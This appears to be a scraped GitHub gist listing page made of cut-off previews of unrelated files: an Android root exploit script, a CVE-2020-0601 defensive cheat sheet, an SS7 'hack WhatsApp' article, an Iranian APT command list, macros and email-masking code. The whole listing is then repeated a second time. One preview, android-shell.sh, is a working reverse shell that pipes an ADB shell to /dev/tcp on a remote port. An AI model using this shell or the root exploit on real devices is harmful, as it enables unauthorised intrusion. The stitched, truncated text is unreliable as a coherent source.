Yuhisern Yehohanan yuhisern7

## root.sh
#!/bin/bash

# Give the usual warning.
clear;
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
sleep 10;
clear;

# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";

## 20200114-TLP-WHITE_CVE-2020-0601.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                yuhisern7
                / 20200114-TLP-WHITE_CVE-2020-0601.md
            
            
              Created May 24, 2021
                — forked from SwitHak/20200114-TLP-WHITE_CVE-2020-0601.md
            
              
                BlueTeam CheatSheet * CVE-2020-0601 * crypt32.dll | Last updated: 2020-01-21 1817 UTC
              
          
      View 20200114-TLP-WHITE_CVE-2020-0601.md
  
      
    CVE-2020-0601 AKA ChainOfFools OR CurveBall
General

Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
The vulnerability was discovered by the U.S. National Security Agency, anounced today (2020-01-14) in their press conference,  followed by a blog post and an official security advisory.
The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation

NSA description:
NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.


## How To Hack WhatsApp & Telegram Using SS7 Flaw
Researchers are easily able to hack WhatsApp and Telegram using the known telecom flaw

We continuously receive queries from readers about how to hack WhatsApp. The world’s most popular cross platform messaging App is seen to be ultimate hack by many because it has recently enabled 256-bit encryption.

For ordinary souls this encryption would take days and months to decode a sentence or a complete message. Ditto with another secure messaging service called Telegram. Though Telegram is not as popular as WhatsApp, it has its ardent group of followers who use it for its encryption as well as snooping free service.

Though both of these Apps are end-to-end encrypted both of them suffer from hardware side vulnerability which can be exploited to hack and hijack both WhatsApp and Telegram.

The vulnerability lies in Signalling System 7, or SS7, the technology used by telecom operators, on which the highly secure messaging system and telephone calls rely. SS7 is a set of telephony signalling protocols developed i

## iranian_apit_groups_possible_commands.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                yuhisern7
                / iranian_apit_groups_possible_commands.md
            
            
              Created Feb 11, 2020
                — forked from MSAdministrator/iranian_apit_groups_possible_commands.md
            
              
                Iranian APT Groups & Possible Commands Used By These Groups
              
          
      View iranian_apit_groups_possible_commands.md
  
      
    Overview
The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:

APT33
APT34
APT39
Charming Kitten


## StraightQuotes2CurlyQuotes.bas
sub StraightQuotes2CurlyQuotes
' Kudos to David for main code: https://gist.github.com/dajare/3924560
' Kudos to Villeroy for simpler, better find patterns:
'	https://forum.openoffice.org/en/forum/viewtopic.php?f=30&t=39902
' Kudos to Kaloian Droganov for how to make the macro atomic:
'	http://stackoverflow.com/questions/853372/how-to-make-a-macro-atomic
rem ----------------------------------------------------------------------
dim document	as object
dim dispatcher	as object
dim undo		as object

## a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740.bas
olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------

## example_script_analysis_office.ps1
param(
    [string]$baseDir = "C:\SomeFolderToStoreTheData\",
    [string]$bw_client =  "000",
    [string]$bw_user = "YOURUSERNAME",
    [string]$bw_password = "YOURPASSWORD",
    [string]$filePath = "Path to Analysis Office Excel.xlsx",
    [string]$year_column = "Analysis Technical Name of Year column"
)
# Essentially the Powershell version of https://blogs.sap.com/2016/12/18/automated-updating-of-data-in-excel-files-bex-ao-via-vbavbscript/

## android-shell.sh
#!/bin/bash
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# By Random_Robbie
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"

## email-masking.js
/* Not sure if this has any effect against email scraping bots but it's an idea.
   It just outputs the string as an array of character codes, then restores it
   real characters after the page loads. With javascript disabled we fail. :( */

// PHP function ///////////////////////////////////
function mask($str) {
  $mask = "";
  for($c=0;$c<strlen($str);$c++) {
    $mask .= "" . ord($str[$c]) . ",";
  }

## emailmask.js
/*
	Create a Mask in an email address
	This function create a mask using a valid email address.
	This is usefull when someone need to confirm the email used in a system
	Author: Gabriel Froes - https://gist.github.com/gabrielfroes
 */
function emailMask(email) {
	var maskedEmail = email.replace(/([^@\.])/g, "*").split('');
	var previous	= "";
	for(i=0;i<maskedEmail.length;i++){
	#!/bin/bash

	# Give the usual warning.
	clear;
	echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
	sleep 10;
	clear;

	# Download and extract exploit files.
	echo "[INFO] Downloading exploit files from GitHub...";
	Researchers are easily able to hack WhatsApp and Telegram using the known telecom flaw

	We continuously receive queries from readers about how to hack WhatsApp. The world’s most popular cross platform messaging App is seen to be ultimate hack by many because it has recently enabled 256-bit encryption.

	For ordinary souls this encryption would take days and months to decode a sentence or a complete message. Ditto with another secure messaging service called Telegram. Though Telegram is not as popular as WhatsApp, it has its ardent group of followers who use it for its encryption as well as snooping free service.

	Though both of these Apps are end-to-end encrypted both of them suffer from hardware side vulnerability which can be exploited to hack and hijack both WhatsApp and Telegram.

	The vulnerability lies in Signalling System 7, or SS7, the technology used by telecom operators, on which the highly secure messaging system and telephone calls rely. SS7 is a set of telephony signalling protocols developed i
	sub StraightQuotes2CurlyQuotes
	' Kudos to David for main code: https://gist.github.com/dajare/3924560
	' Kudos to Villeroy for simpler, better find patterns:
	' https://forum.openoffice.org/en/forum/viewtopic.php?f=30&t=39902
	' Kudos to Kaloian Droganov for how to make the macro atomic:
	' http://stackoverflow.com/questions/853372/how-to-make-a-macro-atomic
	rem ----------------------------------------------------------------------
	dim document as object
	dim dispatcher as object
	dim undo as object
	olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
	===============================================================================
	FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
	Type: OpenXML
	-------------------------------------------------------------------------------
	VBA MACRO ThisWorkbook.cls
	in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
	(empty macro)
	-------------------------------------------------------------------------------
	param(
	[string]$baseDir = "C:\SomeFolderToStoreTheData\",
	[string]$bw_client = "000",
	[string]$bw_user = "YOURUSERNAME",
	[string]$bw_password = "YOURPASSWORD",
	[string]$filePath = "Path to Analysis Office Excel.xlsx",
	[string]$year_column = "Analysis Technical Name of Year column"
	)
	# Essentially the Powershell version of https://blogs.sap.com/2016/12/18/automated-updating-of-data-in-excel-files-bex-ao-via-vbavbscript/
	#!/bin/bash
	# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
	# By Random_Robbie
	adb connect $1:5555
	adb shell sh -i >& /dev/tcp/$2/4444 0>&1
	echo "[] Should have a shell now ..... Be nice :) []"
	/* Not sure if this has any effect against email scraping bots but it's an idea.
	It just outputs the string as an array of character codes, then restores it
	real characters after the page loads. With javascript disabled we fail. :( */

	// PHP function ///////////////////////////////////
	function mask($str) {
	$mask = "";
	for($c=0;$c<strlen($str);$c++) {
	$mask .= "" . ord($str[$c]) . ",";
	}
	/*
	Create a Mask in an email address
	This function create a mask using a valid email address.
	This is usefull when someone need to confirm the email used in a system
	Author: Gabriel Froes - https://gist.github.com/gabrielfroes
	*/
	function emailMask(email) {
	var maskedEmail = email.replace(/([^@\.])/g, "*").split('');
	var previous = "";
	for(i=0;i<maskedEmail.length;i++){